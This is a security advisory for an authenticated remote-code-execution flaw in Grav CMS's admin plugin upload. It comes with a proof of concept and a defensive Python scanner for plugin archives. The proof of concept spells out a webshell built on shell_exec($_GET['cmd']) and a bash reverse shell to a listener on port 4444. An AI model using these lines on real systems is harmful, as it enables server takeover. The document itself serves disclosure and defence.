### Critical Vulnerability Information

#### Vulnerability Overview

- **CVE ID**: CVE-2025-50286
- **Type**: Authenticated Remote Code Execution (RCE)
- **Location**: /admin/tools/direct-install (Admin Panel > Tools > Direct Install)
- **Impact**: Arbitrary PHP code execution and potential full system compromise
- **Authentication Required**: Yes (Administrator access)
- **Affected Versions**: Grav CMS v1.7.48 / Admin Plugin v1.10.48

#### Proof of Concept (PoC)

1. Set up listener: `nc -lvp 4444`
2. Log in to Grav admin panel as administrator.
3. Navigate to Tools > Direct Install.
4. Upload malicious plugin ZIP (`evilplugin.zip`) with the following structure:

   ```
   evil/plugin/
   ├── evilplugin.php    # Contains shell_exec($_GET['cmd'])
   └── blueprints.yaml   # Minimal blueprint to pass validation
   ```

5. Trigger reverse shell: `curl --get --data-urlencode "cmd=bash -c 'bash -i >& /dev/tcp/host.docker.internal/4444 0>&1'" `
6. Receive reverse shell:

   ```
   $ nc -lvp 4444
   Listening on 0.0.0.0 4444
   Connection received on
   www-data@target:/var/www/html$ whoami
   www-data
   ```

#### Affected Components

- **Endpoint**: /admin/tools/direct-install
- **Functionality**: Plugin upload and auto-load without validation

#### Test Environment

- Debian 11
- Apache2 + PHP 7.4
- Grav CMS v1.7.48 (with Admin Plugin v1.10.48)

#### Discoverer

- @binneko

#### References

- [Grav CMS Github](https://github.com/getgrav/grav)
- [CVE Record - CVE-2025-50286](https://nvd.nist.gov/vuln/detail/CVE-2025-50286)
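The root cause named under Affected Components is that an uploaded plugin archive is installed and loaded with no validation of its contents. The following is an added example of the kind of pre-install inspection a defender would put in front of such an upload path; it is not Grav's code and not part of the original advisory. It unpacks a plugin ZIP in memory, flags entries whose names would escape the extraction directory, flags PHP files that hand request-controlled input to command- or code-execution functions (the `shell_exec($_GET['cmd'])` pattern the advisory describes), and checks that a `blueprints.yaml` is present. The sample archive it builds is constructed here to mirror the layout shown in the PoC; the function and variable names are the example's own.

```python
import io
import re
import zipfile

# PHP functions that execute shell commands or evaluate code. Their presence in
# an uploaded plugin is not proof of malice, but it should block auto-install
# until a human has reviewed the file.
DANGEROUS_CALLS = re.compile(
    r"\b(shell_exec|exec|system|passthru|popen|proc_open|eval|assert)\s*\(",
    re.IGNORECASE,
)
# Request-controlled inputs that turn one of the calls above into a webshell.
SUPERGLOBALS = re.compile(r"\$_(GET|POST|REQUEST|COOKIE|SERVER)\b")


def scan_plugin_zip(zip_bytes: bytes) -> dict:
    """Inspect a plugin archive before it is extracted and loaded.

    Returns {'findings': [(entry_name, reason), ...], 'has_blueprint': bool}.
    An empty findings list means nothing in the archive tripped a rule.
    """
    findings = []
    has_blueprint = False
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        for info in zf.infolist():
            name = info.filename
            # Entry names with '..' components or a leading '/' would write
            # outside the plugin directory when extracted.
            if name.startswith("/") or ".." in name.split("/"):
                findings.append((name, "path escapes the extraction directory"))
                continue
            if name.endswith("blueprints.yaml"):
                has_blueprint = True
            if name.lower().endswith(".php"):
                source = zf.read(name).decode("utf-8", errors="replace")
                calls = sorted({c.lower() for c in DANGEROUS_CALLS.findall(source)})
                reads_request = SUPERGLOBALS.search(source) is not None
                if calls and reads_request:
                    findings.append((name, f"request-controlled call to {calls}"))
                elif calls:
                    findings.append((name, f"calls execution function {calls}"))
    if not has_blueprint:
        findings.append(("<archive>", "no blueprints.yaml: not a well-formed plugin"))
    return {"findings": findings, "has_blueprint": has_blueprint}


def build_sample_zip() -> bytes:
    """Constructed sample mirroring the advisory's plugin layout (not a real upload)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("evil/plugin/evilplugin.php", "<?php\nshell_exec($_GET['cmd']);\n")
        zf.writestr("evil/plugin/blueprints.yaml", "name: Evil Plugin\nversion: 1.0.0\n")
    return buf.getvalue()


def build_benign_zip() -> bytes:
    """Constructed sample of a plugin that should pass the scan."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("hello/hello.php", "<?php\nnamespace Grav\\Plugin;\nclass HelloPlugin {}\n")
        zf.writestr("hello/blueprints.yaml", "name: Hello\nversion: 1.0.0\n")
    return buf.getvalue()


if __name__ == "__main__":
    for label, archive in (("malicious", build_sample_zip()), ("benign", build_benign_zip())):
        result = scan_plugin_zip(archive)
        print(f"{label}: {len(result['findings'])} finding(s)")
        for entry, reason in result["findings"]:
            print(f"  {entry}: {reason}")
```

The scan is a gate, not a sandbox: a plugin that passes it is still arbitrary PHP that will run with the web server's privileges once enabled, so the stronger mitigations are restricting who holds the administrator role that reaches Tools > Direct Install and upgrading past the affected versions.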